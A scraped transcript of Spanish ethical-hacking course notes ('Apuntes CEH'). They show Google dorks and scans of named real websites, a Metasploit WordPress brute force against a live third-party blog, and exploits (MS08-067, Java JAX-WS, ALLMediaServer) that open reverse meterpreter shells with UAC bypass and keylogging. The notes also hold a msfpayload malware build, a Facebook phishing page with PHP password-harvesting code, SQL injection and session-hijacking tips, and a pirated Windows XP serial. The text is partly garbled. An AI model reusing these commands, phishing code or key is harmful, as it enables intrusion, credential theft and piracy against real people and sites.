Apuntes Ceh

5/25/2018 Apuntes Ceh

1/14

APUNTES CEH

NO HAY UNA CULTURA DE DAR CLICK!!!

Busqueda detallada por google

allinurl php?id=

allinurl: unillanos.edu.co filetype:pdf

site: unillanos.edu.co -> trae subdominios

allintitle:*/Index of

allinurl: /wp-admin.php?

buscar herramienta foca trae metadata

ANALISIS DE VULNERABILIDADES

entrar a secpoint.com -> freetools

descargar el google hack db tools

unzip google-hack-db-tool-1.5.zip437 cd googleDB\ tool\ 1.5/

438 ls

439 ls db/

440 python googleDB-tool.py -s mkit.com.ar -o mkit.html db/vulnerabilities.txt

447 less mkit.html

448 geany mkit.html

DETECTAR INFO POR EL TELNET

root@bt:~/Downloads/googleDB tool 1.5# telnet www.google.com 80

Trying 173.194.37.146...

Connected to www.google.com.

Escape character is '^]'.

GET HTTP 1.1 /

HTTP/1.0 400 Bad Request

Content-Type: text/html; charset=UTF-8

Content-Length: 1419

Date: Mon, 05 May 2014 20:43:58 GMTServer: GFE/2.0


2/14

root@bt:~/Downloads/googleDB tool 1.5# telnet www.unillanos.edu.co 80Trying 190.0.246.67...

Connected to unillanos.edu.co.

Escape character is '^]'.

get http 1.1 /HTTP/1.1 408 Request Time-out

Date: Mon, 05 May 2014 20:47:05 GMT

Server: Apache/2.2.22 (Ubuntu)

Vary: Accept-Encoding

Content-Length: 309

Connection: close

Content-Type: text/html; charset=iso-8859-1

408 Request Time-out

Request Time-out

Server timeout waiting for the HTTP request from the client.

Apache/2.2.22 (Ubuntu) Server at www.unillanos.edu.co Port 80

Connection closed by foreign host.

SCAN GENERANDO UN NULL SOBRE UN RANGO DE IPS

root@bt:~/Downloads/googleDB tool 1.5# nmap -sn -vv 192.168.72.1-255

Starting Nmap 6.01 ( http://nmap.org ) at 2014-05-05 17:55 ART

Initiating Ping Scan at 17:55

Scanning 255 hosts [4 ports/host]

Ping Scan Timing: About 15.25% done; ETC: 17:58 (0:02:52 remaining)

SCAN GENERANDO UN NULL SOBRE UN RANGO DE IPS

root@bt:~/Downloads/googleDB tool 1.5# nmap -sS -vv 192.168.72.1-255

METODOLOGIA DE ATAQUE

Verificar equipos activos Reconocer puertos abertos Identificar OS y servicios Anaalizar vulnerbilidades. Establecer mapa de ataque Configurar los proxies? Atacar

EXPLOITS


3/14

FAMOSOS

MS08-067

MS09-050

MS10-020: HAY QUE TENER ACTIVO IIS.

EXPLOITSMETSPLOIT (esta hecho en ruby)

Debilidades de enumeracion como wordpress, Mensaje el usuario es incorrecto / ya me

ahorro mas de la mitad del trabajo.

ENTRAR

Cd /opt/metasploit#

EJEMPLO DE ATAQUE SOBRE WORDPRESS

msf > show modules

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > show options

Module options (auxiliary/scanner/http/wordpress_login_enum):

Name Current Setting Required Description

---- --------------- -------- -----------

BLANK_PASSWORDS false no Try blank passwords for all users

BRUTEFORCE true yes Perform brute force authentication

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

DB_ALL_CREDS false no Try each user/password couple stored in the current

database

DB_ALL_PASS false no Add all passwords in the current database to the list

DB_ALL_USERS false no Add all users in the current database to the list

ENUMERATE_USERNAMES true yes Enumerate usernames

PASSWORD no A specific password to authenticate withPASS_FILE no File containing passwords, one per line

Proxies no Use a proxy chain

RANGE_END 10 no Last user id to enumerate

RANGE_START 1 no First user id to enumerate

RHOSTS yes The target address range or CIDR identifier

RPORT 80 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

TARGETURI / yes The base path to the wordpress application

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated byspace, one pair per line

USER_AS_PASS false no Try the username as the password for all users


4/14

USER_FILE no File containing usernames, one per line

VALIDATE_USERS true yes Validate usernames

VERBOSE true yes Whether to print output for all attempts

VHOST no HTTP server virtual host

msf auxiliary(wordpress_login_enum) > set RHOSTS www.mkit.com.arRHOSTS => www.mkit.com.ar

msf auxiliary(wordpress_login_enum) > set TARGETURI /blog/

TARGETURI => /blog/

msf auxiliary(wordpress_login_enum) > exploit

[-] /blog/ does not seeem to be Wordpress site

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(wordpress_login_enum) > set VHOST www.mkit.com.ar

VHOST => www.mkit.com.ar

msf auxiliary(wordpress_login_enum) > exploit

[*] /blog/ - WordPress Version 3.6.1 detected

[*] /blog/ - WordPress User-Enumeration - Running User Enumeration

[+] /blog/ - Found user 'kacho' with id 1

[+] /blog/ - Found user 'chino' with id 2

[+] /blog/ - Found user 'mkit' with id 3

[+] /blog/ - Found user 'nutria' with id 4

[*] /blog/ - Usernames stored in:

/root/.msf4/loot/20140505194954_default_74.63.249.67_wordpress.users_146048.txt

[*] /blog/ - WordPress User-Validation - Running User Validation

[*] /blog/ - WordPress User-Validation - Checking Username:''[-] /blog/ - WordPress User-Validation - Invalid Username: ''

[*] /blog/ - WordPress Brute Force - Running Bruteforce

[*] /blog/ - Brute-forcing previously found accounts...

[*] /blog/ - WordPress Brute Force - Trying username:'kacho' with password:''

[-] /blog/ - WordPress Brute Force - Failed to login as 'kacho'

[*] /blog/ - WordPress Brute Force - Trying username:'chino' with password:''

[-] /blog/ - WordPress Brute Force - Failed to login as 'chino'

[*] /blog/ - WordPress Brute Force - Trying username:'mkit' with password:''

[-] /blog/ - WordPress Brute Force - Failed to login as 'mkit'

[*] /blog/ - WordPress Brute Force - Trying username:'nutria' with password:''

[-] /blog/ - WordPress Brute Force - Failed to login as 'nutria'[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(wordpress_login_enum) >back

msf>clear

OTRO ATAQUE:

msf> search ms08

soft Internet Explorer Data Binding Memory Corruption

exploit/windows/smb/ms08_067_netapi


5/14

msf> use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.237.2

RHOST => 192.168.237.2

msf exploit(ms08_067_netapi) > show targetsmsf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):


---- --------------- -------- -----------

RHOST 192.168.237.2 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) > show payloads

Compatible Payloads

===================

Name Disclosure Date Rank Description

flective Injection), Reverse TCP Stager

windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter

(Reflective Injection), Reverse All-Port TCP Stager

msf exploit(ms08_067_netapi) > set payload windows/patchupmeterpreter/bind_ipv6_tcp

payload => windows/patchupmeterpreter/bind_ipv6_tcp

set LHOST 192.168.237.1 (maquina atacante)

set LPORT 1234

exploit

TALLER METERPRETER CORREGIDO

oot@bt:~# msfconsole

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%

%% %%%


6/14

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%

%% %% %%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%

%% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro%%%%%%%%%%%%%%%%%%%%%%%%%

%% %% %%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%

%% %%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%

%%%%% %%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%% %% %%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%

%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%

%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%%

%%%%%

%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %%

%%%%%

%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%

=[ metasploit v4.9.2-dev [core:4.9 api:1.0] ]

+ -- --=[ 1295 exploits - 695 auxiliary - 207 post ]

+ -- --=[ 335 payloads - 35 encoders - 8 nops ]

msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set RHOST 192.168.237.129

RHOST => 192.168.237.129

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.168.237.128

LHOST => 192.168.237.128

msf exploit(ms08_067_netapi) > set LPORT 1234

LPORT => 1234

msf exploit(ms08_067_netapi) > show aoptions

[-] Invalid parameter "aoptions", use "show -h" for more information

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):


7/14


---- --------------- -------- -----------


RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):


---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)

LHOST 192.168.237.128 yes The listen address

LPORT 1234 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) > rexploit[*] Reloading module...

[*] Started reverse handler on 192.168.237.128:1234[*] Automatically detecting the target...

[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown

[*] We could not detect the language pack, defaulting to English

[*] Selected Target: Windows 2003 SP2 English (NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (769536 bytes) to 192.168.237.129

[*] Meterpreter session 1 opened (192.168.237.128:1234 -> 192.168.237.129:1027) at 2014-

05-06 12:47:59 -0300

meterpreter > getpid

Current pid: 828meterpreter >

TALLER MARTES

Serial xp RHKG3 8YW4W 4RHJG 83M4Y 7X9GW

Instalar windows 7.

Entrar ahttp://pastebin.com/4ZZdFLuUy descargar
http://pastebin.com/4ZZdFLuUhttp://pastebin.com/4ZZdFLuUhttp://pastebin.com/4ZZdFLuUhttp://pastebin.com/4ZZdFLuU


8/14

w32-exec-calc-shellcode.bin

jre-7u7-windows-i586-iftw.exe

ALLMediaServer.exe

METERPRETER EN WINDOWS 7 Y JAVA 7

root@bt:~# msfconsole

_ _

/ \ /\ __ _ __ /_/ __

| |\ / | _____ \ \ ___ _____ | | / \ _ \ \

| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|

|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\

=[ metasploit v4.9.2-dev [core:4.9 api:1.0] ]

+ -- --=[ 1295 exploits - 695 auxiliary - 207 post ]

+ -- --=[ 335 payloads - 35 encoders - 8 nops ]

msf > use exploit/multi/browser/java_jre17_jaxws

msf exploit(java_jre17_jaxws) > set SRVPORT 80

SRVPORT => 80

msf exploit(java_jre17_jaxws) > set URIPATH /soyunarchivolindo.phpURIPATH => /soyunarchivolindo.php

msf exploit(java_jre17_jaxws) > set target 1

target => 1

msf exploit(java_jre17_jaxws) > set payload windows/meterpreter/reverse_tcp


msf exploit(java_jre17_jaxws) > set LHOST 192.168.237.128

LHOST => 192.168.237.128

msf exploit(java_jre17_jaxws) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.237.128:4444[*] Using URL: http://0.0.0.0:80/soyunarchivolindo.php

[*] Local IP: http://192.168.237.128:80/soyunarchivolindo.php

[*] Server started.

AQU SE EJECUTA EL IE A LA RUTE DEL PHP:http://192.168.237.128:80/soyunarchivolindo.php

msf exploit(java_jre17_jaxws) > [*] 192.168.237.132 java_jre17_jaxws - Java Applet JAX-WS

Remote Code Execution handling request

[*] 192.168.237.132 java_jre17_jaxws - Sending Applet.jar

[*] 192.168.237.132 java_jre17_jaxws - Sending Applet.jar[*] Sending stage (769536 bytes) to 192.168.237.132


9/14


05-06 13:33:44 -0300

msf exploit(java_jre17_jaxws) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > run bypassuac

[*] Creating a reverse meterpreter stager: LHOST=192.168.237.128 LPORT=4546

[*] Running payload handler

[*] Uploading Windows UACBypass to victim machine.

[*] Bypassing UAC Restrictions on the system....

[*] Meterpreter stager executable 73802 bytes long

[*] Uploaded the agent to the filesystem....

[*] Executing the agent with endpoint 192.168.237.128:4546 with UACBypass in effect...

[*] C:\Users\felcor\AppData\Local\Temp\QHayEz.exe /c %TEMP%\siwDGh.exe

meterpreter > [*] Meterpreter session 2 opened (192.168.237.128:4546 ->

192.168.237.132:49225) at 2014-05-06 13:36:01 -0300

meterpreter > sessions -i 2

[-] Unknown command: sessions.

meterpreter > sessions -i


meterpreter > sessions -i 2


meterpreter > sessions -i -2


meterpreter > sessions -i

[-] Unknown command: sessions.meterpreter > exit

[*] Shutting down Meterpreter...

[*] 192.168.237.132 - Meterpreter session 1 closed. Reason: User exit

msf exploit(java_jre17_jaxws) > sessions -i

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------2 meterpreter x86/win32 PC\felcor @ PC 192.168.237.128:4546 -> 192.168.237.132:49225

(192.168.237.132)

msf exploit(java_jre17_jaxws) > sessions -i 2

[*] Starting interaction with 2...

meterpreter > shell

Process 3800 created.

Channel 1 created.

Microsoft Windows [Versin 6.1.7601]

Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.


10/14

C:\Windows\System32>

EXPLOIT DE ALLMEDI A SERVER

msf > search allmediaserver

[!] Database not connected or cache not built, using slow search

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8

Buffer Overflow

msf >

msf > use exploit/windows/misc/allmediaserver_bof

msf exploit(allmediaserver_bof) > show options

Module options (exploit/windows/misc/allmediaserver_bof):


---- --------------- -------- -----------

RHOST yes The target address


Exploit target:

Id Name

-- ----

1 ALLMediaServer 0.8 / Windows 7 SP1 - English

msf exploit(allmediaserver_bof) > set RHOST 192.168.237.132

RHOST => 192.168.237.132




---- --------------- -------- -----------



Exploit target:


11/14

Id Name

-- ----


msf exploit(allmediaserver_bof) > set payload windows/meterpreter/reverse_tcp


msf exploit(allmediaserver_bof) > set LHOST 192.168.237.128

LHOST => 192.168.237.128




---- --------------- -------- -----------

RHOST 192.168.237.132 yes The target addressRPORT 888 yes The target port

Payload options (windows/meterpreter/reverse_tcp):


---- --------------- -------- -----------

EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)

LHOST 192.168.237.128 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----


msf exploit(allmediaserver_bof) > exploit

[*] Started reverse handler on 192.168.237.128:4444[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...

[*] Sending stage (769536 bytes) to 192.168.237.132


05-06 13:53:33 -0300

meterpreter > shell

Process 2688 created.

Channel 1 created.

Microsoft Windows [Versin 6.1.7601]Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Program Files (x86)\ALLMediaServer>


12/14

_________________________________________

DESDE EL METERPRETER PUEDO EJECUTAR EL

Keyscan_start

Keyscan_dump

Keyscan_stop

Screenshot

Ejemplo:

meterpreter > keyscan_startStarting the keystroke sniffer...

meterpreter > keyscan_dump

Dumping captured keystrokes...

usuariofe

felipe 12345123

meterpreter > keyscan_stop

Stopping the keystroke sniffer...

meterpreter > screenshot

Screenshot saved to: /root/zKlrQWxJ.jpeg

meterpreter >

_________________________________________

ALTERNATIVA A LA CONSOLA DE MSFCONSOLE:

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.237.132

LPORT=1234 x > malware.exe

PHISHING

COPIAR ARCHIVO login.php de facebook

Modificar el action por auth.php,

CREAR ARCHIVO DE ACTION

root@bt:~# cat /var/www/out.php


13/14

$myfile = fopen("passwords.txt","a+");

fwrite($myfile,$_POST['email']." : ".$_POST['pass']."\n");

?>

Enmascarar URL con facebook

www.facebook.comAAAAAAAAwww.otro.com

____________________________________

SEGURIDAD WEB

Dos tipos

1. SQL INJECTION2. Cross-Site Scripting (XSS)

VER IMAGEN DE SQL INJECTION!!!

Herramientas: sqlmap, sqlninja.Hay analizadores sobre cada cms. En backtrack : pentest->

cms..

Sql para busquedas que entreguen varios registros.

' OR '1'='1

Revisar mysql out file

Hacer una shell en php y tratar de subirla: hay otras mas avanzadas


14/14

El navegador tiene extensiones de gestion de cookiescookie editor!

Herramienta : gresasemonkey addson para firefox y bajar el script injector! Donde ingreso

la captura dump del wireshark.

Buscar session de hitjacking mkit argenteinawww.mkit.com.ar/blog.

backup.dedalo.in

ver paginas de :

sniffer labs de bolivia

dragonjar

security by default
http://www.mkit.com.ar/bloghttp://www.mkit.com.ar/bloghttp://www.mkit.com.ar/bloghttp://www.mkit.com.ar/blog

Apuntes Ceh

Documents

Transcript of Apuntes Ceh